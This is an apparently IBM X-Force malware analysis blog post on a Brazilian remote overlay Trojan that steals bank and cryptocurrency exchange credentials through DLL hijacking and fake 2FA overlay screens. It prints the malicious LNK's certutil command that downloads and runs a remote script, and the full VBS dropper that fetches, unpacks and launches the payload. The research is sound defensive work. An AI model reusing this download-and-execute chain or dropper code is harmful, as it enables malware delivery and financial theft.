The Simpler the Better? Looking Deeper Into the Malware Used in Brazilian Financial Cybercrime

In the first article of this two-part series, we covered recent infection and fraud tactics, techniques and procedures (TTPs) used against Brazilian internet users. In this second post, we’ll cover the analysis of a popular remote overlay Trojan used by financial cybercrime actors in Brazil.

In This Article

Remote overlay malware is quite prolific and generic, and although it happens now and then, it is generally rare to find financial malware in Brazil that could be deemed special or sophisticated. So what’s special about this particular variant? To begin, the dynamic link library (DLL) hijacking technique is not very common, although we have seen it before in Brazil. More interestingly, it seems that the malware’s operators are no longer focused on banks alone; they are now also interested in stealing users’ cryptocurrency exchange accounts, which ties in well with the growing appetite financial cybercrime has for cryptocurrency in Brazil.

Compromising Brazilian Users One Remote Session at a Time

IBM X-Force research follows the Brazilian threat landscape on an ongoing basis. In recent analyses, our team observed a new malware variant from the remote overlay family infecting users in the region.

Remote overlay Trojans are very common among Brazilian fraudsters who target local users. A recent generic variant we analyzed is able to remotely control infected devices using a DLL hijacking technique to load its malicious code into a legitimate binary file of a free antivirus program.

The malicious DLL, which is written in the Delphi programming language typical of Brazilian malware, contains overlay images that the malware plasters over the screen after an infected user authenticates an online banking session. The screens are made to match the look and feel of the victim’s bank and trick victims into providing personal information and two-factor authentication (2FA) elements.

Read the white paper: Preserving trust in digital financial services

Rising Interest in Cryptocurrency

Cryptocurrency trading accounts are becoming more popular than traditional brokerage accounts in Brazil — a trend that local fraudsters are likely familiar with and poised to exploit.

Variants we analyzed in recent campaigns against the major banks in Brazil also targeted cryptocurrency exchange platforms. The attack method is similar to how banks are targeted: by stealing the user’s account credentials, taking over their account and transferring their money to the criminals’ accounts.

A Typical Infection Routine

A look into the infection routine of this remote overlay Trojan shows that the initial compromise happens when a potential victim is lured into downloading what he or she believes to be an official invoice. The file is an archive that harbors the malicious scripts that will ultimately infect the device. Below is a summary of the typical infection tactic:

  1. The victim uses a search engine to find his or her provider’s website and pay a monthly invoice. Instead of the genuine website, the first result is a malicious page that attackers have boosted with paid efforts. The victim accesses that page and keys in his or her identification details to fetch the invoice.
  2. The victim unknowingly downloads a malicious LNK file — a Windows shortcut file — archived inside a ZIP file purporting to be from DETRAN, the ministry of transportation in Brazil.
  3. The LNK file contains a command that will download a malicious Visual Basic (VBS) script from a remote server and run it with a legitimate Windows program, certutil.
  4. The malicious VBS script downloads an additional ZIP file from the attacker’s remote server, this time containing the malware’s malicious DLL payload as well as a legitimate binary file of a free antivirus program it will use to hide the DLL.
  5. The VBS script executes the malware, infecting the device.
  6. Once deployed, the Trojan uses a DLL hijacking technique to load its malicious DLL into the legitimate binary of the antivirus program. This roundabout infection routine helps the malware evade detection by security controls.
  7. After completing the installation, the malware monitors the victim’s browser and goes into action when the victim navigates to a targeted online banking website or cryptocurrency exchange platform.
  8. The malicious DLL component gives the malware its remote control capabilities.

Zooming In on the Malicious LNK File

A closer look at the LNK file reveals the way it abuses certutil, which is installed as part of Certificate Services.

First, the malicious script is downloaded from the remote server under the name “tudodebom”:

“C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f “https://remoteserver/turbulencianoar/tudodebom.txt” %temp%\tudodebom.txt && cd %temp% && rename “tudodebom.txt
  • -urlcache displays or deletes URL cache entries.
  • -split -f forces fetching of a specific URL and updating of the cache.

Once retrieved, the malware changes the file’s name and extension from “tudodebom.txt” to “JNSzlEYAIubkggX.vbs”:

“JNSzlEYAIubkggX.vbs” && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs

The LNK file invokes the Windows command line (CMD) and executes certutil.exe to download a TXT file (.vbs) from a remote host:

hXXps://remoteserver/turbulencianoar/tudodebom.txt

Lastly, the malware executes the malicious VBS script.

Examining the VBS Script

The VBS script downloads the ZIP archive containing the malware payload. It then deploys it on the victim’s device in a directory with the following naming pattern:

“C:\AV product_” + RandomName + “\”

After that process is complete, the script executes the legitimate, but poisoned, binary that will load the malicious DLL and start a connection to the attacker’s command and control (C&C) server.

Interesting elements in this routine include:

  • The use of legitimate remote servers to host attack tools;
  • The abuse of a legitimate binary from an existing antivirus program to hide the malware’s DLL; and
  • The naming convention of the malware, which can make the malware easier to detect and quarantine on infected devices.

Upon analyzing the malware, we found the VBS script that the Trojan uses to deploy its malicious DLL to contain the following:

Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll

Set objShell = CreateObject( “WScript.Shell” )

ubase = “https://remoteserver/turbulencianoar/AuZwaaU.zip”

randname = getrandomstring()

exerandom = “AV product.SystrayStartTrigger-” + randname

filezip = “AuZwaaU.zip”

deffolder = “C:\AV product_” + randname + “\”

filesuccess = objShell.ExpandEnvironmentStrings(“%TEMP%”) + “\java_install.log”

fileexe = “AuZwaaU.exe”

filedll = “AuZwaaU.sys”

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

If (objFSO.FileExists(filesuccess)) Then

WScript.Quit

End If

If not (objFSO.FileExists(filezip)) Then

Set objFile = objFSO.CreateTextFile(filesuccess, True)

objFile.Write ” ”

objFile.Close

‘WScript.Echo msg

dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)

dim bStrm: Set bStrm = createobject(“Adodb.Stream”)

xHttp.Open “GET”, ubase, False

xHttp.Send

with bStrm

.type = 1

.open

.write xHttp.responseBody

.savetofile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip, 2

end with

WScript.Sleep 5000

set objShellApp = CreateObject(“Shell.Application”)

set FilesInZip=objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip).items

objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”)).CopyHere(FilesInZip)

WScript.Sleep 5000

objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip

objFSO.CreateFolder deffolder

WScript.Sleep 3000

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & fileexe, deffolder & exerandom & “.exe”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filedll, deffolder & “AV product.OE.NativeCore.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcp120.sys”, deffolder & “msvcp120.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcr120.sys”, deffolder & “msvcr120.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\LOG”, deffolder & “LOG”

WScript.Sleep 5000

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

Set objShell = CreateObject( “WScript.Shell” )

outFile = objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”

Set objFile = objFSO.CreateTextFile(outFile,True)

objFile.Write “@echo off” & vbCrLf

objFile.Write “@cd ” & deffolder & vbCrLf

objFile.Write “start ” & exerandom & “.exe” & vbCrLf

objFile.Close

objShell.Exec(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”)

WScript.Sleep 10000

objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”

Set objShell = Nothing

Set objFSO = Nothing

Set objShellApp = Nothing

End If

Function getrandomstring()

Dim intMax, k, intValue, strChar, strName

Const Chars = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”

intMax = 6

Randomize()

strName = “”

For k = 1 To intMax

intValue = Fix(62 * Rnd())

strChar = Mid(Chars, intValue + 1, 1)

Randomize()

intValue = Fix(62 * Rnd())

strChar = strChar & Mid(Chars, intValue + 1, 1)

strName = strName & strChar

If (k < 6) Then

strName = strName & “”

End If

Next

getrandomstring = strName

End Function

Remote Overlay Images

Last but not least, the overlay images the malware hosts are no longer exclusive to banks. Our analysis shows that fraudsters in Brazil are just as interested in robbing users of their cryptocurrency.

To accomplish this goal, the threat actors have created a number of overlays to match platforms used in Brazil (we have censored the platform’s logo below). In each case, the attackers prompt the user to verify his or her email address and identity and confirms the user’s security with a fresh one-time password from their tokenization method.

Brazilian remote overlay Trojan

Figure 1: Fake overlay screen asks users to provide information about their identity.

Remote Overlay Brazilian Malware is after cryptocurrency

Figure 2: Fake overlay screen asks users to submit a token code.

Overlays for 2FA requests match the targeted platform’s preference of user authentication elements and include single sign-on (SSO) from email and social accounts:

Brazilian Remote Overlay Malware Asks for SSO

Figure 3: Fake overlay screen asks infected users to use SSO authentication from their webmail/social accounts.

Mitigate Financial Cybercrime Risks

Malware in Brazil is one of the most prolific tactics used by cybercriminals to defraud internet users. Although infection rates can be high for campaigns due to the large number of users affected by each attack, the risks can be mitigated with continued user education and by placing the right controls on user devices to help protect against malware.

Read the white paper: Preserving trust in digital financial services


Contributor'photo

Chen Nahman

Security Threat Researcher, IBM Security (Trusteer)

Chen Nahman is a Security Threat Researcher at IBM Security (Trusteer). Chen is experienced in malware analysis and...